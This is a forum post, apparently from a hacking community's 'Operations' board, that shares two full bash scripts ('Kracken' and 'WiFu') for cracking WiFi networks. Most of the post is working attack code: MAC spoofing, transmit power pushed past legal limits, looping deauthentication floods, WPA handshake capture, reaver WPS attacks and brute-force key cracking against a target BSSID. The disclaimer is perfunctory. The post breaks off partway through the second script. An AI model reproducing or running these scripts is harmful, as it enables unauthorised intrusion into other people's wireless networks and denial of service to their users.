wifi crack SH scripts
True Anons :: Operations :: Operations
Page 1 of 1
wifi crack SH scripts
The Kracken by thisguysayswht
Features:
Wireless interface manipulator.
Hash/rainbow table generator.
Wpa2 Handshake capture
Handshake cracking [pyrit-aircrack] ~ [bruteforce-wordlist-hash tables]
Bruteforce/wordlist time estimation calculator.
Over 55 options in its main and sub menus.
Disclaimer:
I am not responsible for what you do with this code.
If this code sets your computer on fire, I am not responsible.
If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible.
This code is designed to test the security of your router, and not anyone else's.
If this code gets you laid, I might take responsibility.
If you use this code, you are agreeing that it is at your own risk.
WiFu is a simple bash script that uses the Aircrack-ng suite to make WiFi cracking a breeze...
By:thaGH05T
i think it is prefferance what one is better, but have fun
Features:
Wireless interface manipulator.
Hash/rainbow table generator.
Wpa2 Handshake capture
Handshake cracking [pyrit-aircrack] ~ [bruteforce-wordlist-hash tables]
Bruteforce/wordlist time estimation calculator.
Over 55 options in its main and sub menus.
- Code:
#!/bin/bash
#Configuration:
HANDSHAKE='/root/Handshakes/HandShake*.cap'
WORDLIST='/usr/share/wordlists/rockyou.txt'
COWPATTY='/root/Rainbow/cowpatty'
AIROLIB='/root/Rainbow/airolib'
MONITER=mon0
#End configuration
clear
echo "***********[Kracken V-1.0]***********"
echo "* *"
echo "* Wrtten by: thisguysayswht *"
echo "* *"
echo "**************[WARNING]**************"
echo "* *"
echo "* This script can cause damage to *"
echo "* your hardware and/or network. I *"
echo "* am not responsible for any down *"
echo "* time or damages caused. You are *"
echo "* responsible for scripts you run *"
echo "* *"
echo "********[Use at your own risk]*******"
echo ""
echo ""
echo "======[Press enter to continue]======"
read START
if [[ $START == "" ]]; then
sleep 1
clear
fi
while true
do
clear
echo "*******************[Main Menu]**********************"
echo "* *"
echo "* (1) View handshakes *"
echo "* (2) View interfaces *"
echo "* (3) Spoof MAC *"
echo "* (4) Boost wireless card *"
echo "* (5) Start moniter interface *"
echo "* (6) Run wash *"
echo "* (7) Run airodump *"
echo "* (8) Capture handshakes *"
echo "* (9) Create rainbow table *"
echo "* (10) Run reaver *"
echo "* (11) Run aircrack-ng *"
echo "* (12) Run pyrit *"
echo "* (13) Restore wireless interface *"
echo "* (14) Bruteforce calculator *"
echo "* *"
echo "* (15) Exit *"
echo "* *"
echo "****************************************************"
echo ""
read n
case $n in
1)
xterm -hold -e "aircrack-ng $HANDSHAKE" & ;;
2)
xterm -hold -e iwconfig & ;;
3)
clear
echo "*************************************************"
echo "* Please select a wireless interface from below *"
echo "*************************************************"
echo ""
iwconfig
echo ""
echo "*************************************************"
echo ""
read WIRELESS
[[ $WIRELESS == "" ]]
sleep 1
clear
echo "Shutting down $WIRELESS..."
echo ""
sleep 1
ifconfig $WIRELESS down
echo "Changing to random MAC..."
echo ""
sleep 1
macchanger -r $WIRELESS
echo""
echo "Bringing spoffed interface up..."
echo ""
ifconfig $WIRELESS up
sleep 3
clear ;;
4)
clear
echo ""
echo "*****************[WARNING]********************"
echo "* *"
echo "* Setting your wireless card at a power *"
echo "* higher than the OEM spec can damage your *"
echo "* card. *"
echo "* *"
echo "**********************************************"
echo ""
echo ""
echo "========Do you wish to proceed[y/n]?=========="
echo ""
read START
if [[ $START == "y" ]]; then
sleep 1
clear
echo "*************************************************"
echo "* Please select a wireless interface from below *"
echo "*************************************************"
echo ""
iwconfig
echo ""
echo "*************************************************"
echo ""
read WIRELESS0
[[ $WIRELESS0 == "" ]]
sleep 1
clear
echo "Setting country to BO (Bolivia)..."
echo ""
sleep 1
iw reg set BO
echo "Boosting power on $WIRELESS0..."
echo ""
iwconfig $WIRELESS0 txpower 30
sleep 3
else
echo ""
echo "Returning to script..."
sleep 3
fi;;
5)
clear
echo "*************************************************"
echo "* Please select a wireless interface from below *"
echo "*************************************************"
echo ""
iwconfig
echo ""
echo "*************************************************"
echo ""
read WIRELESS2
[[ $WIRELESS2 == "" ]]
sleep 1
clear
echo "Starting interface on $WIRELESS2..."
sleep 1
airmon-ng start $WIRELESS2
sleep 3
clear ;;
6)
xterm -hold -e wash -i $MONITER -C & ;;
7)
xterm -hold -e airodump-ng $MONITER & ;;
8)
clear
cd ~
mkdir Handshakes &> /dev/null
echo "**********************************"
echo "* Please enter the network BSSID *"
echo "**********************************"
echo ""
read BSSID
[[ $BSSID == "" ]]
clear
echo "************************************"
echo "* Please enter the network channel *"
echo "************************************"
echo ""
read CHNEL
[[ $CHNEL == "" ]]
xterm -hold -e "airodump-ng --ig -w Handshakes/HandShake -c $CHNEL --bssid $BSSID $MONITER" &
sleep 5 &&
xterm -hold -e "while true; do sleep 5; aireplay-ng -0 5 -q 2 --ig -a $BSSID $MONITER; done" & ;;
9)
while true
do
clear
echo "****************[Rainbow tables]********************"
echo "* *"
echo "* (1) View handshakes *"
echo "* (2) Import rockyou.txt *"
echo "* (3) Import wordlist *"
echo "* (4) Import custom crunch *"
echo "* (5) Add ESSID *"
echo "* (6) Remove ESSID *"
echo "* (7) View ESSIDs *"
echo "* (8) Create rainbow table *"
echo "* (9) View rainbow tables *"
echo "* (10) Export to airolib *"
echo "* (11) Export to cowpatty *"
echo "* *"
echo "* (12) Return to main script *"
echo "* *"
echo "****************************************************"
echo ""
read n
case $n in
1)
clear
xterm -hold -e aircrack-ng $HANDSHAKE & ;;
2)
clear
gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
sleep 2
xterm -hold -e "pyrit -i $WORDLIST import_passwords" & ;;
3)
clear
echo "***********************************************"
echo "* Enter full path to password file for import *"
echo "***********************************************"
echo ""
read READES
[[ $READES == "" ]]
xterm -hold -e "pyrit -i '$READES' import_passwords" & ;;
4)
clear
echo "****************************************************"
echo "* What arguments would you like to pass to crunch? *"
echo "****************************************************"
echo ""
read CRUNCH
[[ $CRUNCH == "" ]]
xterm -hold -e "crunch $CRUNCH|pyrit -i- import_passwords" & ;;
5)
clear
echo "***************"
echo "* Enter ESSID *"
echo "***************"
echo ""
read READES
[[ $READES == "" ]]
xterm -hold -e "pyrit -e '$READES' create_essid" & ;;
6)
clear
echo "***************"
echo "* Enter ESSID *"
echo "***************"
echo ""
read READES
[[ $READES == "" ]]
xterm -hold -e "pyrit -e '$READES' delete_essid" & ;;
7)
clear
xterm -hold -e "pyrit list_essids" & ;;
8)
clear
echo "***************"
echo "* Enter BSSID *"
echo "***************"
echo ""
read READBS
[[ $READBS == "" ]]
xterm -hold -e "pyrit -i- -b $READBS batch" & ;;
9)
clear
xterm -hold -e "pyrit eval" & ;;
10)
clear
cd ~
mkdir Rainbow &> /dev/null
xterm -hold -e "pyrit -o $AIROLIB export_hashdb" & ;;
11)
clear
cd ~
mkdir Rainbow &> /dev/null
xterm -hold -e "pyrit -o $COWPATTY export_hashdb" & ;;
12)
clear
break;;
*)
clear
echo "*******************************************"
echo "* Invalid option. Press any key to return *"
echo "*******************************************"
read -p "";;
esac
sleep 1
done;;
10)
clear
echo "****************************************************"
echo "* Enter BSSID you would like to attack with reaver *"
echo "****************************************************"
echo ""
read RBSSID
[[ $RBSSID == "" ]]
sleep 1
clear
echo "***************************************************************"
echo "* Enter arguments you would like to pass to reaver [optional] *"
echo "***************************************************************"
echo ""
read REAVERA
[[ $REAVERA == "" ]]
echo "Starting reaver attack..."
sleep 3
clear
xterm -hold -e "reaver -i $MONITER -b $RBSSID $REAVERA -vv" & ;;
11)
while true
do
clear
echo "*****************[Aircrack-ng]**********************"
echo "* *"
echo "* (1) View handshakes *"
echo "* (2) Use rockyou.txt *"
echo "* (3) Bruteforce 8 numeric *"
echo "* (4) Bruteforce 9 numeric *"
echo "* (5) Bruteforce 10 numeric *"
echo "* (6) Bruteforce 8 a-z *"
echo "* (7) Bruteforce 8 A-Z *"
echo "* (8) Bruteforce 8 a-z + numeric *"
echo "* (9) Bruteforce 8 A-Z + numeric *"
echo "* (10) Bruteforce 8 a-z + A-Z *"
echo "* (11) Bruteforce custom *"
echo "* (12) Specify wordlist *"
echo "* (13) Use rainbow table *"
echo "* *"
echo "* (14) Exit to main script *"
echo "* *"
echo "****************************************************"
echo ""
read n
case $n in
1)
xterm -hold -e aircrack-ng $HANDSHAKE & ;;
2)
clear
echo "Decompressing rockyou.txt..."
echo ""
gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
sleep 1
echo "Starting attack..."
echo ""
sleep 3
xterm -hold -e aircrack-ng -w $WORDLIST $HANDSHAKE & ;;
3)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
sleep 1
echo "Starting bruteforce 8 numeric"
echo ""
xterm -hold -e "crunch 8 8 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
4)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 9 numeric"
echo ""
xterm hold -e "crunch 9 9 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
5)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 10 numeric"
echo ""
xterm -hold -e "crunch 10 10 1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
6)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"#
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 8 a-z"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
7)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""#
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 8 A-Z"
echo ""
xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
8)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""#
read FKUAC
[[ $FKUAC == "" ]]
echo "Starting bruteforce 8 a-z numeric"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|aircrack-ng -a 2 -w- -b $FKUAC #$HANDSHAKE" & ;;
9)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
#
echo "Starting bruteforce 8 A-Z numeric"
echo ""
xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
10)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
#
echo "Starting bruteforce 8 a-z A-Z"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
11)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
clear
echo "****************************************************"
echo "* What arguments would you like to pass to crunch? *"
echo "****************************************************"
echo ""
read CRUNCH
[[ $CRUNCH == "" ]]
echo ""
echo "Starting custom bruteforce attack"
echo ""
xterm -hold -e "crunch $CRUNCH|aircrack-ng -a 2 -w- -b $FKUAC $HANDSHAKE" & ;;
12)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
clear
echo "**********************************************"
echo "* Please enter the full path to the wordlist *"
echo "**********************************************"
echo ""
read WCUST
[[ $WCUST == "" ]]
echo ""
echo "Attacking with $WCUST"
echo ""
xterm -hold -e "aircrack-ng -a 2 -w '$WCUST' -b $FKUAC $HANDSHAKE" & ;;
13)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read FKUAC
[[ $FKUAC == "" ]]
echo ""
echo "Attacking with airolib hash table"
echo ""
xterm -hold -e "aircrack-ng -r '$AIROLIB' -b $FKUAC $HANDSHAKE" & ;;
14)
clear
break;;
*)
clear
echo "*******************************************"
echo "* Invalid option. Press any key to return *"
echo "*******************************************"
read -p ""
esac
sleep 1
done;;
12)
while true
do
clear
echo "*********************[Pyrit]************************"
echo "* *"
echo "* (1) View handshakes *"
echo "* (2) Use rockyou.txt *"
echo "* (3) Bruteforce 8 numeric *"
echo "* (4) Bruteforce 9 numeric *"
echo "* (5) Bruteforce 10 numeric *"
echo "* (6) Bruteforce 8 a-z *"
echo "* (7) Bruteforce 8 A-Z *"
echo "* (8) Bruteforce 8 a-z + numeric *"
echo "* (9) Bruteforce 8 A-Z + numeric *"
echo "* (10) Bruteforce 8 a-z + A-Z *"
echo "* (11) Bruteforce custom *"
echo "* (12) Specify wordlist *"
echo "* (13) Use rainbow table *"
echo "* (14) Benchmark pyrit *"
echo "* *"
echo "* (15) Exit to main script *"
echo "* *"
echo "****************************************************"
echo ""
read n
case $n in
1)
xterm -hold -e aircrack-ng $HANDSHAKE & ;;
2)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Decompressing rockyou.txt..."
echo ""
gunzip /usr/share/wordlists/rockyou.txt.gz &> /dev/null
sleep 2
echo "Starting attack..."
echo ""
sleep 3
xterm -hold -e "pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
3)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 numeric"
echo ""
xterm -hold -e "crunch 8 8 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
4)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 9 numeric"
echo ""
xterm -hold -e "crunch 9 9 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
5)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 10 numeric"
echo ""
xterm -hold -e "crunch 10 10 1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
6)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 a-z"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
7)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 A-Z"
echo ""
xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
8)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 a-z numeric"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyz1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
9)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 A-Z numeric"
echo ""
xterm -hold -e "crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
10)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo "Starting bruteforce 8 a-z A-Z"
echo ""
xterm -hold -e "crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
11)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
clear
echo "****************************************************"
echo "* What arguments would you like to pass to crunch? *"
echo "****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo ""
echo "Starting custom bruteforce attack"
echo ""
xterm -hold -e "crunch $CRUNCH|pyrit -i '$WORDLIST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
12)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
clear
echo "**********************************************"
echo "* Please enter the full path to the wordlist *"
echo "**********************************************"
echo ""
read WCUST
[[ $WCUST == "" ]]
echo ""
echo "Attacking with $WCUST"
echo ""
xterm -hold -e "pyrit -i '$WCUST' -r '$HANDSHAKE' -b '$PYRITB' attack_passthrough" & ;;
13)
clear
echo "*****************************************************"
echo "* Please enter the network BSSID you wish to attack *"
echo "*****************************************************"
echo ""
read PYRITB
[[ $PYRITB == "" ]]
echo ""
echo "Attacking with rainbow table"
echo ""
xterm -hold -e "pyrit -r '$HANDSHAKE' -b '$PYRITB' attack_db" & ;;
14)
clear
xterm -hold -e "pyrit benchmark" & ;;
15)
clear
break;;
*)
clear
echo "*******************************************"
echo "* Invalid option. Press any key to return *"
echo "*******************************************"
read -p ""
esac
sleep 1
done;;
13)
clear
echo "*************************************************"
echo "* Please select a wireless interface from below *"
echo "*************************************************"
echo ""
iwconfig
echo ""
echo "*************************************************"
echo ""
read WIRELESS3
[[ $WIRELESS3 == "" ]]
clear
echo "Resetting country..."
echo ""
sleep 1
iw reg set BO
echo "Resetting power..."
echo ""
iwconfig $WIRELESS3 txpower 20
sleep 1
echo "Disabling moniter mode..."
echo ""
sleep 1
airmon-ng stop $MONITER
echo "Shutting down main wireless interface..."
echo ""
sleep 1
ifconfig $WIRELESS3 down
echo "Restoring perment MAC..."
echo ""
sleep 1
macchanger -p $WIRELESS3
echo "Bringing main wireless interface back up..."
echo ""
sleep 1
ifconfig $WIRELESS3 up
echo "Wireless interface restored"
echo ""
sleep 3;;
14)
clear
echo "*************************"
echo "* Enter keys per second *"
echo "*************************"
echo ""
read KPS
[[ $KPS == "" ]]
clear
echo "*************************"
echo "* Enter wordlist length *"
echo "*************************"
echo ""
read WLL
[[ $WLL == "" ]]
((A=$WLL/$KPS))
((B=$A/60))
((C=$B/60))
((D=$C/24))
((E=$D/7))
((F=$E/52))
clear
echo "****************************"
echo "* Bruteforce time estimate *"
echo "****************************"
echo ""
echo ""
echo "SECONDS: $A"
echo ""
echo "MINUTES: $B"
echo ""
echo "HOURS: $C"
echo ""
echo "DAYS: $D"
echo ""
echo "WEEKS: $E"
echo ""
echo "YEARS: $F"
echo ""
echo ""
echo "*************************"
echo "* Press enter to return *"
echo "*************************"
read -p "";;
15)
clear
echo "***********"
echo "* Goodbye *"
echo "***********"
sleep 3
clear
exit;;
*)
clear
echo "*******************************************"
echo "* Invalid option. Press any key to return *"
echo "*******************************************"
read -p "";;
esac
done
./Kracken.sh
Disclaimer:
I am not responsible for what you do with this code.
If this code sets your computer on fire, I am not responsible.
If you use this code irresponsibly, and the FBI kicks your door down, I am not responsible.
This code is designed to test the security of your router, and not anyone else's.
If this code gets you laid, I might take responsibility.
If you use this code, you are agreeing that it is at your own risk.
WiFu is a simple bash script that uses the Aircrack-ng suite to make WiFi cracking a breeze...
By:thaGH05T
- Code:
#!/bin/bash
##################################################################################################
# WiFu is a simple bash script that uses the Aircrack-ng suite to make WiFi cracking a breeze... #
# #
# v1.0 By:thaGH05T Email support questions to john@ghostlyhaks.com #
##################################################################################################
# This program is free software; you can redistribute it and/or modify it under the terms of the #
# GNU General Public License as published by the Free Software Foundation; either version 2 of #
# the License, or any later version. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; #
# without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See #
# the GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License along with this program; if #
# not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, #
# MA 02110-1301, USA. #
##################################################################################################
######### Start by clearing the terminal.
clear
############### Catch ctrl-c input from user
trap main 2
############# Set global functions
main () {
clear
echo -e "
\e[1;34m[*]\e[0m Please wait while we clean up your mess...
"
airmon-ng stop mon0 >>.trash.txt
if [[ -e .trash.txt ]] ; then
rm .trash.txt
fi
if [[ -e .wifi.kate-swp ]] ; then
rm .wifi.kate-swp
fi
sleep 3
bash ${0}
kill $$
}
########### Loop for main menu
mainmenu=1
while [[ $mainmenu == 1 ]] ; do
# Run only as root.
if [ "$(id -u)" != "0" ]; then
echo -e "
\e[1;31m[!]\e[0m \e[1;5m This script must be run as root!!! \e[0m
"
exit 1
else
clear
fi
########### Create variable for the title.
atitle="
\e[31m############################################\e[0m
\e[31m#\e[0m \e[34mWiFu v1.0 - By:thaGH05T\e[0m \e[31m#\e[0m
\e[31m#\e[0m \e[31m#\e[0m
\e[31m#\e[0m \e[34mFor support email john@ghostlyhaks.com\e[0m \e[31m#\e[0m
\e[31m#\e[0m \e[31m#\e[0m
\e[31m#\e[0m \e[34mMaking WiFi cracking easy since 2013\e[0m \e[31m#\e[0m
\e[31m############################################\e[0m
\e[31m (
( ( )\ )
)\))( ' ( (()/( (
((_)()\ ) )\ /(_)) ))\
_(())\_)()((_) (_))_|/((_)
\ \((_)/ / (_) | |_ (_))(
\ \/\/ / | | | __|| || |
\_/\_/ |_| |_| \_,_| \e[0m
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
Wich attack would you like to launch first???
"
################### Set the prompt
prompt="Option: "
################### Set options
options=("Just Listen" "Just Crack" "Spoof MAC" "WPA" "WEP" "DOS" "Main Menu" "Quit")
echo -e "$atitle"
PS3="
$prompt"
#################### What each option does
select opt in "${options[@]}" ; do
case $opt in
###################### Start Just Listen
"Just Listen")
jl=1
while [[ $jl == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
echo -e "
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
sleep 2
airmon-ng start $card >>.trash.txt
airodump-ng mon0
jl=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
;;
##################### Start Just Crack
"Just Crack")
jc=1
while [[ $jc == 1 ]] ; do
clear
echo -e "
\e[1;34m[*]\e[0m What would you like to do? [1|2]
1) Use pre-computed rainbow tables.
2) Use dictionary file or word-list.
"
read crack
if [[ $crack == 1 ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, Using pre computed rainbow tables.
"
sleep 3
clear
echo -e "
\e[1;34m[*]\e[0m What is the ESSID of the targeted network? (If the target network name has spaces make sure to place it in quotations)
"
read essid
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the rainbow tables you will be using? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read rt
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the capture file you want to crack? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read cap
cowpatty –s $essid –d $rt –r $cap || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
jc=0
elif [[ $crack == 2 ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m Ok, using dictionary or word-list
"
sleep 3
clear
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the dictionary or word-list you want to use? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read word
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the ivs file you want to crack? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read ivs
aircrack-ng -l ~/cracked-password.txt -w $word $ivs || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
jc=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid operation. Please try again.
"
sleep 3
fi
done
echo -e "
\e[1;32mAll Done!!!\e[0m - If you used a dictionary or word-list and your passphrase was found then it was saved to cracked-password.txt in your home directory. If you use rainbow tables and your passphrase was found it is listed above so take the time to record it now.
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
;;
#################### Start Spoof MAC
"Spoof MAC")
sm=1
while [[ $sm == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
ifconfig $card down >>.trash.txt
macchanger -r $card
ifconfig $card up >>.trash.txt
sm=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
echo -e "
All done!!! Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
;;
############### Start WPA
"WPA")
ncard=1
while [[ $ncard == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
clear
ncard=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
clear
airmon-ng start $card >>.trash.txt
echo -e "
\e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data.
"
sleep 5
konsole --new-tab -e airodump-ng mon0 2>>.trash.txt
qnet=1
while [[ $qnet == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the name of the network you want to target?
"
read net
if [[ $net == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $net == * ]] ; then
clear
qnet=0
fi
done
qone=1
while [[ $qone == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the BSSID of the network you want to target?
"
read bssid
if [[ $bssid == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $bssid == * ]] ; then
clear
qone=0
fi
done
qtwo=1
while [[ $qtwo == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What channel is the network on?
"
read chan
if [[ $chan == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $chan == * ]] ; then
clear
qtwo=0
fi
done
qthree=1
while [[ $qthree == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What do you want to name the capture file?
"
read name
if [[ $name == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $name == * ]] ; then
qthree=0
fi
done
clear
echo -e "
\e[1;34m[*]\e[0m You now have 10 seconds to close the previousely opened tab. GO!
"
sleep 10
clear
howonetwo=1
while [[ $howonetwo == 1 ]] ; do
clear
echo -e "
\e[1;34m[*]\e[0m How do you plan on cracking the capture file? [1|2]
1) With pre-computed rainbow tables.
2) Wth a dictionary file or word-list.
"
read how
if [[ $how == "1" ]] ; then
konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid mon0 2>>.trash.txt
howonetwo=0
elif [[ $how == "2" ]] ; then
konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid --ivs mon0 2>>.trash.txt
howonetwo=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid operation. Please try again.
"
sleep 3
fi
done
clear
echo -e "
\e[1;34m[*]\e[0m OK, lets try and deauthenticate a client to get the handshake. What is the station ID?
"
read client
handyn=1
while [[ $handyn == 1 ]] ; do
echo -e
aireplay-ng -0 10 -a $bssid -c $client mon0
echo -e "
\e[1;34m[*]\e[0m Look in the window that was opened a minute ago and see if the handshake appeared at the top.
"
echo -e "
\e[1;34m[*]\e[0m Did the handshake appear? [y|n|new]
"
read hand
if [[ $hand == y ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, time to crack the capture file!
"
sleep 3
handyn=0
elif [[ $hand == n ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, lets try again. If you do not recieve a handshake after a few more tries you can type [new] to deauthenticate a different client or you can press \e[1;31mCtrl+C\e[0m to go back to the main menu.
"
sleep 5
clear
elif [[ $hand == new ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, lets try and deauthenticate a client to get the handshake. What is the station ID?
"
read client
else
clear
